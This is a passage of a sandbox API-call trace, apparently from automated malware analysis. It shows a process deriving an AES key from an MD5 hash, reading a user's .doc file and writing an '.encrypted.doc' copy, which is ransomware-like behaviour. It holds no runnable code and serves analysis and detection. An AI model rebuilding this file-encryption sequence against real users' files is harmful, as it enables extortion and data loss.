wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.035] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0034.035] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0034.035] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.035] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0034.035] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.035] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.035] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.035] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.036] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.036] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.036] CryptCreateHash (in: hProv=0x7d5b30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.036] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.036] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.036] CryptHashData (hHash=0x7c2240, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.036] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.037] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.037] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0034.037] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0034.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.037] CryptDeriveKey (in: hProv=0x7d5b30, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c21c0) returned 1 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0034.037] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0034.037] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0034.037] CryptDestroyHash (hHash=0x7c2240) returned 1 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2f8 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b87d0 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce98 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0034.037] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19b8 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0034.037] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1f8 [0034.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da138 [0034.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da138 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.038] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\guwdp36jwck.doc"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0034.038] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.038] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae940 | out: lpNewFilePointer=0x0) returned 1 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c970 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.038] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0034.038] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.038] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.039] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da198 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1e8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cda8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1d8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8e0 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da258 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da238 [0034.039] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8e0 | out: hHeap=0x770000) returned 1 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab338 [0034.039] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da318 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x110) returned 0x7c9968 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c9a80 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xe0) returned 0x7c95d0 [0034.040] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46")) returned 0x10 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9a80 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1e8 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0034.040] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da198 | out: hHeap=0x770000) returned 1 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.040] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da198 [0034.040] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\gTXVbfxNeSRqjbX46\\guwDP36jwcK.encrypted.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\jhneqt\\pro_og0zrj3k\\gtxvbfxnesrqjbx46\\guwdp36jwck.encrypted.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1940 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1e8 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.041] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b85a8 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b85a8 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.041] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.041] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2280 | out: hHeap=0x770000) returned 1 [0034.041] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.041] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2280 [0034.042] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1d8 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae988 [0034.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae988 | out: hHeap=0x770000) returned 1 [0034.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0034.042] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1b8 [0034.042] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x100000) returned 0x1090020 [0034.042] SetFilePointerEx (in: hFile=0x140, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6ae990 | out: lpNewFilePointer=0x0) returned 1 [0034.042] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x1271, lpOverlapped=0x0) returned 1 [0034.043] ReadFile (in: hFile=0x140, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6ae9b8, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6ae9b8*=0x0, lpOverlapped=0x0) returned 1 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0034.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1b8 [0034.043] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1271) returned 0x7c9968 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x1090020 | out: hHeap=0x770000) returned 1 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cee0 | out: hHeap=0x770000) returned 1 [0034.043] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da288 | out: hHeap=0x770000) returned 1 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da288 [0034.044] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1271) returned 0x955018 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c9968 | out: hHeap=0x770000) returned 1 [0034.044] HeapFree (in: hHeap=0x770000, dwFlags=0x0, 